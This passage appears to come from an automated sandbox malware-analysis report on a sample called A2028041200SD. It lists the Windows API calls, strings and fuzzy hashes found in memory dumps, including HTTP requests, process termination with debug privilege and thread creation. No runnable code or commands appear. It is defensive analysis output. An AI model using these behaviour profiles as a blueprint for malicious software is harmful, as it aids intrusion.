                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: d199f0512c651a7a28e2c85516532ccb8973c3128624f2c8774b427adfab1cc8
                                                                        • Instruction ID: 45f117672cee8bf96c5137995df691b1ca081f1d36f14632599c0bd451912672
                                                                        • Opcode Fuzzy Hash: d199f0512c651a7a28e2c85516532ccb8973c3128624f2c8774b427adfab1cc8
                                                                        • Instruction Fuzzy Hash: 19712371A05204DFDF25DF64CC81AEA3BB9FF49320F18466AED655A2A6D7308C81DF50
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                          • Part of subcall function 0090B63C: GetCursorPos.USER32(000000FF), ref: 0090B64F
                                                                          • Part of subcall function 0090B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0090B66C
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000001), ref: 0090B691
                                                                          • Part of subcall function 0090B63C: GetAsyncKeyState.USER32(00000002), ref: 0090B69F
                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0095ED3C
                                                                        • ImageList_EndDrag.COMCTL32 ref: 0095ED42
                                                                        • ReleaseCapture.USER32 ref: 0095ED48
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0095EDF0
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0095EE03
                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0095EEDC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 1924731296-2107944366
                                                                        • Opcode ID: 61a4150af2aa0dd53f8afa7d3cb2fd969869f008e89feddf0b87f104a5e2f973
                                                                        • Instruction ID: 4a79a86c41703e43f4c78ee8f5164c21c520844e0a49eb894d4e7164e2064dc3
                                                                        • Opcode Fuzzy Hash: 61a4150af2aa0dd53f8afa7d3cb2fd969869f008e89feddf0b87f104a5e2f973
                                                                        • Instruction Fuzzy Hash: 0251BA31118304AFD714EF24CC9AFAA37F8FB88714F500A1DF985962E2DB709A08CB52
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009445FF
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0094462B
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0094466D
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00944682
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0094468F
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009446BF
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00944706
                                                                          • Part of subcall function 00945052: GetLastError.KERNEL32(?,?,009443CC,00000000,00000000,00000001), ref: 00945067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1241431887-3916222277
                                                                        • Opcode ID: 53a66821a40798cc97974fc64322116e9904da9e6df63be024d5c29f551b332e
                                                                        • Instruction ID: 3daae2d40e34ae62aa62f872146cca498f91f75fcc866be75ba6964c0f0c2c8c
                                                                        • Opcode Fuzzy Hash: 53a66821a40798cc97974fc64322116e9904da9e6df63be024d5c29f551b332e
                                                                        • Instruction Fuzzy Hash: D7419EB2501208BFEB059F50CC89FBF77ACFF49354F014026FA059A141D7B09E449BA4
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0098DC00), ref: 0094B715
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0098DC00), ref: 0094B749
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0094B8C1
                                                                        • SysFreeString.OLEAUT32(?), ref: 0094B8EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: 8d7f46712ae05e3c9ad7997b0c9d7ffd65e6afb307a2f0e633b125a02713d90f
                                                                        • Instruction ID: 79a9fe72b72b64516e084417d190dbefe0c2d708e0b63f7a021fce8a85c12c19
                                                                        • Opcode Fuzzy Hash: 8d7f46712ae05e3c9ad7997b0c9d7ffd65e6afb307a2f0e633b125a02713d90f
                                                                        • Instruction Fuzzy Hash: BAF10875A00209AFCF14DFA4C884EAEB7B9FF89315F148459F915AB250DB31EE46CB90
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009524F5
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00952688
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009526AC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009526EC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0095270E
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095286F
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009528A1
                                                                        • CloseHandle.KERNEL32(?), ref: 009528D0
                                                                        • CloseHandle.KERNEL32(?), ref: 00952947
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: 228ed597e6a2f2c610b8c0334f40b5e1971fb830fbc9f48ddf7aca3d92ec4a5e
                                                                        • Instruction ID: 4cae94a01905515d3bf7d3f002dab5e700421cee06dfdecdab563a6ae2dc698c
                                                                        • Opcode Fuzzy Hash: 228ed597e6a2f2c610b8c0334f40b5e1971fb830fbc9f48ddf7aca3d92ec4a5e
                                                                        • Instruction Fuzzy Hash: C0D1AC31604200DFCB14EF25C891B6ABBE5BF85314F18895DF9899B3A2DB31ED45CB92
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0095B3F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 31169b590b4b79072ccdae5c940685a946424f26193c633b32ae6cb2b8970f2b
                                                                        • Instruction ID: bcfa5737e99e2572c4ab78e2e394c5ed44e9dd5c97f6924fa4b8e7ea8e6821a1
                                                                        • Opcode Fuzzy Hash: 31169b590b4b79072ccdae5c940685a946424f26193c633b32ae6cb2b8970f2b
                                                                        • Instruction Fuzzy Hash: 6051AD31602204BFEF34DF2ACC85BAD7B68AB05326F644511FE14E62E2D775E9889B50
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0096DB1B
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096DB3C
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0096DB51
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0096DB6E
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0096DB95
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0090A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0096DBA0
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0096DBBD
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0090A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0096DBC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1268354404-0
                                                                        • Opcode ID: acd167f19eb00be58aab94cb3a92ff14626ec7030724e0618879f99637ed6523
                                                                        • Instruction ID: 28b32132f4e0fb156e836a5c5427cfb24c1cd11df55e6887f95a5453aa7cb68b
                                                                        • Opcode Fuzzy Hash: acd167f19eb00be58aab94cb3a92ff14626ec7030724e0618879f99637ed6523
                                                                        • Instruction Fuzzy Hash: 83517771A15308EFDB20DF68CC91FAA77B8AF48360F104619F916962D0D7B0AD80EB90
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00935FA6,?), ref: 00936EF1
                                                                          • Part of subcall function 009372CB: GetFileAttributesW.KERNEL32(?,00936019), ref: 009372CC
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 009375CA
                                                                        • _wcscmp.LIBCMT ref: 009375E2
                                                                        • MoveFileW.KERNEL32(?,?), ref: 009375FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: 9b807cb42c39763c0c8b07715cbce855aa32bb2a8d1df30086467af6cfba81dd
                                                                        • Instruction ID: 775baa8638515a61a4f5d5d4e159d2af3c330343ca678d9724c7d72aa0ea6f04
                                                                        • Opcode Fuzzy Hash: 9b807cb42c39763c0c8b07715cbce855aa32bb2a8d1df30086467af6cfba81dd
                                                                        • Instruction Fuzzy Hash: D35112F2A0921D5ADF64EB94D841ADEB3BC9F4C310F00449AF605E3141EA7496C5CF60
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0090EAEB
                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0090EB32
                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0096DC86
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0096DAD1,00000004,00000000,00000000), ref: 0096DCF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: ba31b37780f6933e42823ab75ac871064b4d0ca0d498c6959bd5245c5a24e942
                                                                        • Instruction ID: 5f76ebfe51a7d1290707404c9dee4df896b7f53766e5b170e189e64e377ea8ea
                                                                        • Opcode Fuzzy Hash: ba31b37780f6933e42823ab75ac871064b4d0ca0d498c6959bd5245c5a24e942
                                                                        • Instruction Fuzzy Hash: 6141167171A280DFDB394B2A8D8DB3A7A9EAF45314F590C0DF09B825E1C678BC80E711
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0092B26C
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092B273
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0092B288
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 0092B290
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 0092B293
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 0092B2A3
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 0092B2AB
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 0092B2AE
                                                                        • CreateThread.KERNEL32(00000000,00000000,0092B2D4,00000000,00000000,00000000), ref: 0092B2C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 3d3fa9de3d47987863a9e5ff4352ff45013c69f65e2b54792ad8329df0b28bd4
                                                                        • Instruction ID: 4f9f426008a739b95d12cc9888b36e0eeda30cf7e46b6d1336d4d1a3ecf25a00
                                                                        • Opcode Fuzzy Hash: 3d3fa9de3d47987863a9e5ff4352ff45013c69f65e2b54792ad8329df0b28bd4
                                                                        • Instruction Fuzzy Hash: 4301F6B2255308BFEB10ABA5DC49F6B3BACEF88704F008411FA08CB1A1CA709840DB21
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: febf491e58175608bb7d06b76783e46c97312ebacfe3752453719cfe3d0d1bea
                                                                        • Instruction ID: eab6b58c5ba43cfec376219e2e51381ceac74e342b314602222ac9ff40ff864f
                                                                        • Opcode Fuzzy Hash: febf491e58175608bb7d06b76783e46c97312ebacfe3752453719cfe3d0d1bea
                                                                        • Instruction Fuzzy Hash: C0E1C3B1A0121AAFDF54DFA8D881FAE77B9EF48314F148429F905AB281D770AD41CF90
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: ee7e6a1027c7503d6545a070b06f57e15aeb857852039ed81668c142e69ce9d6
                                                                        • Instruction ID: 67f2df726d9bf5a0344bc10270fc892ee99e1a5e876f9c964b8fd17604927176
                                                                        • Opcode Fuzzy Hash: ee7e6a1027c7503d6545a070b06f57e15aeb857852039ed81668c142e69ce9d6
                                                                        • Instruction Fuzzy Hash: 51917B71E00219ABDB24CFA5C888FAEBBB8EF85715F108559F515AB280DB70D944CFA0
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00959B19
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00959B2D
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00959B47
                                                                        • _wcscat.LIBCMT ref: 00959BA2
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00959BB9
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00959BE7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: e0404b02e24f333426965959f6f9b0e44ec011f8591735813c7b23f76c77328e
                                                                        • Instruction ID: 765872b08dfa89f5616875fbb26645dba05f777dc6ba22e0d48fc08d7880d2d1
                                                                        • Opcode Fuzzy Hash: e0404b02e24f333426965959f6f9b0e44ec011f8591735813c7b23f76c77328e
                                                                        • Instruction Fuzzy Hash: AE419171A00308EBEB21DF64DC85BEE77BDEF48351F10442AF989A7291D6759D88CB60
                                                                        APIs
                                                                          • Part of subcall function 00936532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00936554
                                                                          • Part of subcall function 00936532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00936564
                                                                          • Part of subcall function 00936532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009365F9
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0095179A
                                                                        • GetLastError.KERNEL32 ref: 009517AD
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009517D9
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00951855
                                                                        • GetLastError.KERNEL32(00000000), ref: 00951860
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00951895
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: f923f1239488b75bc74338f88557befa711bba487fa99c94336335a1d2c480a7
                                                                        • Instruction ID: e5d55e39ed322e528e32e623402f5155a09ddbb8064361b949442970287e64c9
                                                                        • Opcode Fuzzy Hash: f923f1239488b75bc74338f88557befa711bba487fa99c94336335a1d2c480a7
                                                                        • Instruction Fuzzy Hash: C141B072600200AFDB15EF69C895F6EB7B5AF84311F048458FA069F3D2DB759948CF91
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 009358B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: da1fc06965db3e288804ebf786690d673bcdb7fbe4d3b05175f9db516b28617e
                                                                        • Instruction ID: ee6fe201b09dc4c4693ad19c9e7665e623e6113561419ec40e8c8c27472c8f3f
                                                                        • Opcode Fuzzy Hash: da1fc06965db3e288804ebf786690d673bcdb7fbe4d3b05175f9db516b28617e
                                                                        • Instruction Fuzzy Hash: 3E110D3670D746FBE7055B549C83DAA63ECAF99314F21003AF501E5381E7A5AA814AA4
                                                                        APIs
                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0093A806
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
